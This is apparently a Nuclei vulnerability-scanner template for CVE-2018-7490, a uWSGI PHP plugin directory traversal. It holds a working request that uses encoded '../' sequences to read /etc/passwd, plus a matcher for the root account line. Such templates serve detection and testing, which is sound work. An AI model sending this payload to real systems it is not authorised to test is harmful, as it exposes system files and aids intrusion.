21 lines
389 B
YAML
21 lines
389 B
YAML
id: CVE-2018-7490
|
|
|
|
info:
|
|
name: uWSGI PHP Plugin Directory Traversal
|
|
author: madrobot
|
|
severity: high
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|